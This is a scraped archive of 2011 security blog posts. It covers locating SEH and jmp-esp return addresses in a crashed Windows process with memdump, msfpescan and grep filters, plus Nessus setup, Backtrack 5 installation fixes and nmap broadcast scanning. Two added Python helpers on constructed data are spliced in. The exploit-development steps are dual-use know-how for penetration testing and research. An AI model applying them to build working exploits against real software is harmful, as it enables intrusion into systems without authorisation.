For very restrictive protocols (text-only, for example), finding a working jump address in memory can be challenging.<br />
<br />
Here is one approach to finding useable jump addresses, using a couple of Metasploit tools (and a bit of grepping).<br />
<br />
<span style="color: #cc0000;">Please remember to use these techniques only for legitimate educational and testing purposes and not maliciously.</span><br />
<br />
<br />
<b>Dumping memory</b><br />
<br />
In this example, I am experimenting with a Windows application crash.<br />
<br />
We can dump all the accessible memory for the target process using memdump.exe, which is available in the Metasploit Framework (MSF) included with Backtrack 5, in the following directory:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">/pentest/exploits/framework3/tools/memdump/</span><br />
<br />
This tool needs to be transferred to the target Windows system and run against the target process in its crashed state, as follows:<br />
<br />
<div style="font-family: 'Courier New', Courier, monospace;">memdump.exe &lt;process id&gt; &lt;output dir&gt;</div><br />
This produces a directory full of files which can then be zipped, and transferred back to the Backtrack 5 system and unpacked.<br />
<br />
<br />
<b>Scanning the dump</b><br />
<br />
To scan this process dump, we can use msfpescan to extract the jump addresses from the memory locations which were available to the process.<br />
<br />
This example finds pop/pop/ret sequences, for an SEH exploit: <br />
<br />
<br />
<div style="font-family: 'Courier New', Courier, monospace;">/pentest/exploits/framework3/msfpescan -p -M ./dumpdir > scanresults.txt</div><br />
Or here for example we look for the classic "jmp esp": <br />
<br />
<br />
<br />
<div style="font-family: 'Courier New', Courier, monospace;">/pentest/exploits/framework3/msfpescan -j esp -M ./dumpdir > scanresults.txt</div><br />
<br />
We can then sort through the results to remove addresses containing characters that cannot be used in a restricted buffer.<br />
<br />
<br />
<b>Removing unusable addresses</b><br />
<br />
<br />
Grep can be used to filter these results in various ways. <br />
<br />
Here we grep to remove addresses that contain null bytes (0x00), or the 0x0a and 0x0d bytes (the LF/CR characters).<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">grep ^0x scanresults.txt | grep -v "^0x00\|0a\|0d" | grep -v "^0x..00\|0a\|0d" | grep -v "^0x....00\|0a\|0d" | grep -v "^0x......00\|0a\|0d" | sort</span><br />
<br />
<br />
<br />
<br />
Here we grep for addresses which don't have any non-alphanumeric bytes in any of the 4 octets:<br />
<br />
<div style="font-family: 'Courier New', Courier, monospace;">grep ^0x scanresults.txt | grep -v "^0x[0-2\|8-9\|a-f]\|3a\|3b\|3c\|3d\|3e\|3f\|40\|5b\|5c\|5d\|5e\|5f\|60\|7b\|7c\|7d\|7e\|7f" | grep -v "^0x..[0-2\|8-9\|a-f]\|3a\|3b\|3c\|3d\|3e\|3f\|40\|5b\|5c\|5d\|5e\|5f\|60\|7b\|7c\|7d\|7e\|7f" | grep -v "^0x....[0-2\|8-9\|a-f]\|3a\|3b\|3c\|3d\|3e\|3f\|40\|5b\|5c\|5d\|5e\|5f\|60\|7b\|7c\|7d\|7e\|7f" | grep -v "^0x......[0-2\|8-9\|a-f]\|3a\|3b\|3c\|3d\|3e\|3f\|40\|5b\|5c\|5d\|5e\|5f\|60\|7b\|7c\|7d\|7e\|7f" | sort</div><br />
(That last one looks a bit horrible. There may be a shorter way to grep this, but this is effective as a cut'n'paste hack)<br />
<br />
<br />
The results look like this:<br />
<br />
<div style="font-family: 'Courier New', Courier, monospace;">0x74723956 pop esi; pop ebp; retn 0x0004<br />
0x74724a6b pop esi; pop ebp; retn 0x0004<br />
0x74734e36 pop esi; pop ebp; retn 0x000c<br />
0x7473526c pop esi; pop ebp; retn 0x000c<br />
etc...</div><br />
<br />
As you can see, these addresses contain only the usable characters.<br />
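The greps above match "0a"/"0d" as substrings anywhere in the line, so they also throw away addresses where the pair merely straddles two bytes (and any line whose instruction text happens to contain them). As an added example (not part of the original post), here is a filter that checks the four address bytes individually, run over a constructed msfpescan-style listing, in both the bad-character and the alphanumeric-only mode:

```python
import re

# Constructed msfpescan-style listing (not from a real dump); the last line
# mimics the file-name banner msfpescan prints and must be ignored.
SAMPLE_SCAN = """\
0x74723956 pop esi; pop ebp; retn 0x0004
0x74724a6b pop esi; pop ebp; retn 0x0004
0x7473526c pop esi; pop ebp; retn 0x000c
0x74a0d512 pop edi; pop esi; retn
0x74720d41 pop esi; pop ebp; retn 0x0004
0x00401ab3 pop esi; pop ebp; retn
0x7a5b4c3d pop ebx; pop ebp; retn
[./dumpdir/00000001.rng]
"""

# Byte values that survive a text-only protocol: digits and letters.
ALPHANUMERIC = frozenset(b"0123456789"
                         b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                         b"abcdefghijklmnopqrstuvwxyz")
# Bad characters for the "remove null, LF and CR" case from the post.
NULL_CR_LF = frozenset(b"\x00\x0a\x0d")

ADDR_LINE = re.compile(r"^(0x[0-9a-fA-F]{8})\s+(.+)$")


def address_bytes(addr):
    """Return the four bytes of a 32-bit address written as 0xXXXXXXXX."""
    return bytes.fromhex(addr[2:])


def is_usable(addr, allowed=None, bad=NULL_CR_LF):
    """True if every byte is in `allowed` (when given), else if none is in `bad`.

    The address goes into the buffer little-endian, but all four bytes are
    checked, so byte order does not affect the verdict.
    """
    bs = address_bytes(addr)
    if allowed is not None:
        return all(b in allowed for b in bs)
    return not any(b in bad for b in bs)


def filter_scan(text, allowed=None, bad=NULL_CR_LF):
    """Parse msfpescan output and keep only usable (address, instruction) pairs."""
    kept = []
    for line in text.splitlines():
        m = ADDR_LINE.match(line)
        if m and is_usable(m.group(1), allowed, bad):
            kept.append((m.group(1), m.group(2)))
    return sorted(kept)


if __name__ == "__main__":
    print("without 0x00/0x0a/0x0d:")
    for addr, ins in filter_scan(SAMPLE_SCAN):
        print(addr, ins)
    print("alphanumeric only:")
    for addr, ins in filter_scan(SAMPLE_SCAN, allowed=ALPHANUMERIC):
        print(addr, ins)
```

Feed it the real scanresults.txt and the per-byte check keeps 0x74a0d512-style addresses that the substring grep discards.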
<br />
So it would then be just a question of cross-referencing these addresses with the dlls you want to use (based on various criteria such as portability and protection bypass) and choosing ones that will work for the exploit.Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com2tag:blogger.com,1999:blog-6428740549041097500.post-68176648918909463542011-05-20T07:59:00.005+01:002011-08-29T10:27:20.750+01:00Easy Nessus scan for a beginner with Backtrack 5I have got to say that the inclusion of Nessus in Backtrack 5 is great. This makes performing a basic vulnerability scan easy.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjICgtcfBwfY3LzOYX4d9QjDOS5F2Z35uwxNVwYCTnYG9iXle-Us35xojbAAzOZZyGqfzOfZlJ_q2dtCR24vPe5O1dtL1el7h8rhiOKtfBfmTkufGd9OpHO-k1vqzkDY4j0lIcfCSLazqs/s1600/nessus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjICgtcfBwfY3LzOYX4d9QjDOS5F2Z35uwxNVwYCTnYG9iXle-Us35xojbAAzOZZyGqfzOfZlJ_q2dtCR24vPe5O1dtL1el7h8rhiOKtfBfmTkufGd9OpHO-k1vqzkDY4j0lIcfCSLazqs/s400/nessus.png" width="400" /></a></div><br />
<br />
<span class="Apple-style-span" style="color: #cc0000;">UPDATE</span>: - In Backtrack 5 R1 you will need to additionally download and install Nessus, which I have briefly described in the following post<br />
<br />
<a href="http://insidetrust.blogspot.com/2011/08/setting-up-nessus-in-backtrack-5-r1.html">http://insidetrust.blogspot.com/2011/08/setting-up-nessus-in-backtrack-5-r1.html</a><br />
<br />
<br />
<b>The rest of the setup</b><br />
<br />
<br />
1) Get a free home-use key on the <a href="http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code%20">Tenable/Nessus</a> website<br />
<br />
<br />
2) Enter the key as follows<br />
<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx &lt;your key here&gt;</span><br />
<br />
<br />
3) Create a user and password (and hit enter to skip the rules)<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">/opt/nessus/sbin/nessus-adduser</span><br />
<br />
<br />
4) Start the service<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">/etc/init.d/nessusd start</span><br />
<br />
<br />
5) Start the scan, and view the report<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">https://localhost:8834/</span><br />
<br />
<br />
The Nessus user-interface is so straightforward that I don't think there is any point in me describing where to click or what to put in. Just play with it for a minute or two and you should see how it works.<br />
<br />
Using Nessus to scan a set of machines really is a no-brainer. Here is a sample report (this XP system needs patching ;o)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyNKlVNyalYqMMmzeqHygbLallKMbm142s4kY9vKUYvLlp9MKJdAtmVrxNs8bmwdE8Oxh0TgNds0Cr4sbOwo1ENUmeYshXpvNeyQkjU_pqDgttemQ8MgpZ8W8aMqSDbq63qaw9Fr5x074/s1600/nessus1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyNKlVNyalYqMMmzeqHygbLallKMbm142s4kY9vKUYvLlp9MKJdAtmVrxNs8bmwdE8Oxh0TgNds0Cr4sbOwo1ENUmeYshXpvNeyQkjU_pqDgttemQ8MgpZ8W8aMqSDbq63qaw9Fr5x074/s400/nessus1.png" width="400" /></a></div><br />
Whilst this is no substitute for a Penetration test, a basic vulnerability scan can certainly help identify computers that are missing patches, or have poor configurations.<br />
Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com9tag:blogger.com,1999:blog-6428740549041097500.post-13708088191733361212011-05-19T18:27:00.012+01:002011-08-28T20:18:35.917+01:00Overcoming problems installing Backtrack 5 on a systemI had a challenging couple of hours today getting Backtrack 5 running on my main Desktop system.<br />
<br />
Having tried the VMs, and also installed the 32bit KDE version on one of my laptops (both of which were very straightforward), I thought I would bite-the-bullet, backup the data from my main research system, blow it away, and install Backtrack Linux 5 on that as well.<br />
<br />
Unfortunately I ran into a few issues, with installation drives, and graphics drivers.<br />
<br />
So here are some notes on solutions (more for me to remember than anything, but may be helpful to someone else?)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz8-fYFYCcN8manDEOHQrGfpRCyV9UjALEyuzlNpMcalT3PieR_0G2oB_mN2Kak3fur9WpH6nWlYctZpzE_GlAqYp6rj5EMnWXPWS2_uKgWYWRnrKedgUIrTM6n5bm7SrWqNOQeBHU_lo/s1600/bt5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz8-fYFYCcN8manDEOHQrGfpRCyV9UjALEyuzlNpMcalT3PieR_0G2oB_mN2Kak3fur9WpH6nWlYctZpzE_GlAqYp6rj5EMnWXPWS2_uKgWYWRnrKedgUIrTM6n5bm7SrWqNOQeBHU_lo/s400/bt5.png" width="400" /></a></div><b>Boot-loader issues</b><br />
<br />
There seems to be something odd about the partitioning and boot-loader installation in Backtrack 5. I have multiple drives, one of which is a striped-pair. It didn't seem to be writing the boot-loader to the correct drive. Not sure why, but to work around this, I popped out the cables for my RAID array disks, and installed on the single 500GB OS disk (with no other live disks in the chassis at the time) and that seemed to resolve it.<br />
<br />
<br />
<b>Graphics-driver woes</b><br />
<br />
I have an on-board Nvidia card, which I know has produced some issues before, with my Backtrack 4 R2 install. No surprise, I needed to do some extra fiddling again to get this to work.<br />
<br />
After the install, "startx" was crashing-out with various errors telling me that there were no suitable devices for X to run on.<br />
<br />
(This was despite the fact that graphics drivers on the live DVD were working fine) <br />
<br />
The solution to this was to use a proprietary Nvidia driver-installation script. This also requires the kernel-sources to be downloaded and unpacked as follows:<br />
<br />
<div style="font-family: 'Courier New', Courier, monospace;">prepare-kernel-sources</div><br />
(If you need to do this, go and make a cup of tea while this downloads and unpacks) <br />
<br />
<div style="font-family: 'Courier New', Courier, monospace;">cd /usr/src/linux<br />
cp -rf include/generated/* include/linux/</div><br />
However, the configuration script I had previously used with Backtrack 4 R2 (NVIDIA-Linux-x86-195.36.24-pkg1.sh) did not work, but luckily a more recent script did (NVIDIA-Linux-x86-270.41.19.run).<br />
(I hadn't been able to get that one working with Backtrack 4 R2)<br />
<br />
I then ran the Nvidia driver install as follows, and bingo, it worked:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">./NVIDIA-Linux-x86-270.41.19.run --kernel-source-path='/usr/src/linux'</span><br />
<br />
You can get the latest drivers from here: <a href="http://www.nvidia.com/object/unix.html">http://www.nvidia.com/object/unix.html</a><br />
<br />
<br />
<b>Setting up the rest of my lab</b><br />
<br />
The VMware-player install went seamlessly (just using the "VMware-Player-3.1.4-385536.i386.bundle" script file from the VMware website) and I have copied on my archived virtual-victim-lab.<br />
<br />
So now I have a working online Backtrack 5. Hurrah!<br />
<br />
Here are a few extras I have installed:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">apt-get -y install gns3 openoffice.org tftp vlc gimp vsftpd xchat kcalc mplayer kate okular uml-utilities ktorrent k3b kmag ksnapshot</span><br />
<br />
<br />
Now it's just a question of getting used to KDE 4.5 (which seems quite different to KDE 3.x).<br />
<br />
<br />
<b>Missing things</b><br />
<br />
There seem to be some other things that I am used to seeing on Backtrack 4 that are either not there, or have changed significantly. I guess I will figure those out by immersing myself in some exploit development over the next few days.<br />
<br />
Anyway, time for some pwnage...Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com17tag:blogger.com,1999:blog-6428740549041097500.post-74165174561196070792011-05-18T11:16:00.005+01:002011-05-18T21:17:59.339+01:00Nmap nse broadcast scanning in Backtrack 5One of the more recent developments in nmap, over the past couple of years, is the addition of nmap nse scripts making nmap a much more flexible and expandable network-mapper and vulnerability-scanner (it seems like there are many more scripts being contributed with every release).<br />
<br />
There are now over 170 different scripts included by default in nmap. (I've been playing with nmap version 5.51, which comes with Backtrack 5)<br />
<br />
One of the more interesting new types of nse script is the broadcast discovery scripts. To me, it looks like these new scanning techniques will become much more important in the future, as more IPv6 is deployed and used, and IPv4 gradually wanes. (Though I do think some IPv4 could be around for another 15-20 years, these protocols will gradually decrease in importance.)<br />
<br />
IPv6-only networks mean a lot of changes in the way hosts can be discovered, as scanning entire net-blocks will become much more difficult due to the vast size of the address-space, but broadcast scanning, and passive sniffing can help identify IPv6 systems.<br />
<br />
I've seen it reported that "nse broadcast-scans, are stealthy because they are passive". This is not true, they are still active scans. However, they are very low traffic scans, which attempt to discover network services using inbuilt ease-of-use functionality in the target network. (This type of scanning is perhaps something that could be done early in reconnaissance or discovery as a first network scan.)<br />
<br />
<br />
<b>What are broadcast scans?</b><br />
<br />
Rather than UDP or TCP port-scans or network scans using ICMP or ARP, broadcast scans are a lot less intrusive. Think of broadcast scans as nmap saying:<br />
<br />
"Hi there. I'm new on the network. Do any computers out there have any services I might want to use?"<br />
<br />
Whilst this sounds a bit dumb from a security perspective, there are lots of computers and various protocols that could respond, even systems that have firewalls enabled with all ports blocked will respond in some cases.<br />
<br />
From a network visibility perspective, we are also talking about only a very few packets per protocol, rather than the thousands required for a port-scan, and these "conversations" should be normal on the network, so this is much less likely to be detected by network security software.<br />
<br />
I set up a couple of systems in my test network. Broadcast scans don't need an IP address range. They are simply run like this:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">nmap -P0 --script=broadcast</span><br />
<br />
..and here is one of my initial results<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OgL0R5qapCt1NSE5qXvRhrJLVkJHT_YlxoLC6y7xDTWpJao3RtG5Xlhxw5TgluAlUTSzCTSREgdb79Cw72zyHVAASrb3ld_Jg-DmXWwJ6ionNv3PFoXPp6I2GVXC3S7CQ3EtSI1yKlg/s1600/nsebroadcast2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8OgL0R5qapCt1NSE5qXvRhrJLVkJHT_YlxoLC6y7xDTWpJao3RtG5Xlhxw5TgluAlUTSzCTSREgdb79Cw72zyHVAASrb3ld_Jg-DmXWwJ6ionNv3PFoXPp6I2GVXC3S7CQ3EtSI1yKlg/s400/nsebroadcast2.png" width="400" /></a></div><br />
This shows Universal Plug and Play running on a couple of systems which lets us know of their existence. As you can see from a wireshark capture, this is not a passive scan, but is low bandwidth:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4xebgLDxhsWX0ltSPKlt8D5kKW-Kh9AZkOvwJ50qkIq8EKrs0c5a7ie7tEMWLSRtCkHSGcoQA_6ecVm04GnST2awzTgrq1D601XYJBk0-S6EBjI_Og0TV80U3rX1LtcvywV_nRKvukjo/s1600/nsebroadcast.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4xebgLDxhsWX0ltSPKlt8D5kKW-Kh9AZkOvwJ50qkIq8EKrs0c5a7ie7tEMWLSRtCkHSGcoQA_6ecVm04GnST2awzTgrq1D601XYJBk0-S6EBjI_Og0TV80U3rX1LtcvywV_nRKvukjo/s400/nsebroadcast.png" width="400" /></a></div><br />
<br />
Here is another example with Web Services Dynamic Discovery responding (this is another Windows 7 system on my test network).<br />
<br />
<div style="font-family: 'Courier New', Courier, monospace;">nmap -P0 --script=broadcast<br />
<br />
Starting Nmap 5.51 ( http://nmap.org ) at 2011-05-18 05:23 EDT<br />
Pre-scan script results:<br />
| broadcast-wsdd-discover:<br />
| Devices<br />
| 192.168.1.70<br />
| Message id: c6cf6b9b-834d-4320-85e1-e1a65299ee2f<br />
| Address: http://192.168.1.70:5357/9a36912c-3560-493e-82d7-eadd95271272/<br />
|_ Type: Device pub:Computer<br />
WARNING: No targets were specified, so 0 hosts scanned.<br />
Nmap done: 0 IP addresses (0 hosts up) scanned in 40.08 seconds</div><br />
<div><br />
<br />
<b>The responses</b><br />
<br />
So these responses from the target systems are basically telling us their IP address (in this case an IPv4 address), the fact that the system has an HTTP service, and a service it might be running. Basically, following the broadcast, these systems are contacting the attacker to tell him their addresses.<br />
<br />
In both these cases Windows 7 has the firewall <b><u>enabled</u></b> (with default "secure" settings, so you be the judge of whether this is a good default behavior or not).<br />
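From the defensive side, the same output is a cheap inventory check: any host that answers a broadcast is announcing itself regardless of its firewall. As an added example (not from the post), a small parser that turns the pre-scan output above into per-host records and flags hosts missing from a known asset list; the second device (192.168.1.71) and its identifiers are constructed:

```python
import re

# Constructed sample: the pre-scan output from the post, plus a made-up
# second device (192.168.1.71) so that grouping by host is exercised.
SAMPLE_OUTPUT = """\
Starting Nmap 5.51 ( http://nmap.org ) at 2011-05-18 05:23 EDT
Pre-scan script results:
| broadcast-wsdd-discover:
|   Devices
|     192.168.1.70
|       Message id: c6cf6b9b-834d-4320-85e1-e1a65299ee2f
|       Address: http://192.168.1.70:5357/9a36912c-3560-493e-82d7-eadd95271272/
|       Type: Device pub:Computer
|     192.168.1.71
|       Message id: 00000000-0000-0000-0000-000000000000
|       Address: http://192.168.1.71:5357/00000000-0000-0000-0000-000000000000/
|_      Type: Device pub:Computer
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 40.08 seconds
"""

# "| script-name:" opens a script's block; a bare IPv4 or IPv6 address opens a host.
SCRIPT_HEADER = re.compile(r"^([a-z0-9][a-z0-9-]*):$")
HOST_LINE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}|[0-9a-fA-F:]*:[0-9a-fA-F:]*)$")


def parse_prescan(text):
    """Group NSE pre-scan script output as {script: {host: {field: value}}}."""
    results = {}
    script = host = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                       # banner, warnings, summary line
        line = raw.lstrip("|_ ").strip()   # drop the "| " / "|_ " gutter and indent
        m = SCRIPT_HEADER.match(line)
        if m:
            script = results.setdefault(m.group(1), {})
            host = None
        elif script is None:
            continue
        elif HOST_LINE.match(line):
            host = script.setdefault(line, {})
        elif host is not None and ": " in line:
            key, value = line.split(": ", 1)   # "Address: http://..." keeps its colons
            host[key] = value.strip()
        # Other lines ("Devices") are section labels and carry no data.
    return results


def unexpected_hosts(results, inventory):
    """Hosts that answered a broadcast but are not in the known inventory."""
    seen = {h for hosts in results.values() for h in hosts}
    return sorted(seen - set(inventory))


if __name__ == "__main__":
    parsed = parse_prescan(SAMPLE_OUTPUT)
    for script, hosts in parsed.items():
        for host, fields in hosts.items():
            print(script, host, fields.get("Type", ""))
    print("not in inventory:", unexpected_hosts(parsed, {"192.168.1.70"}))
```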
<br />
So, in short, I think we will be hearing a lot more about broadcast-based service scans, (and also passive data collection) as IPv6 rolls out in corporate infrastructure.<br />
<br />
</div>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com7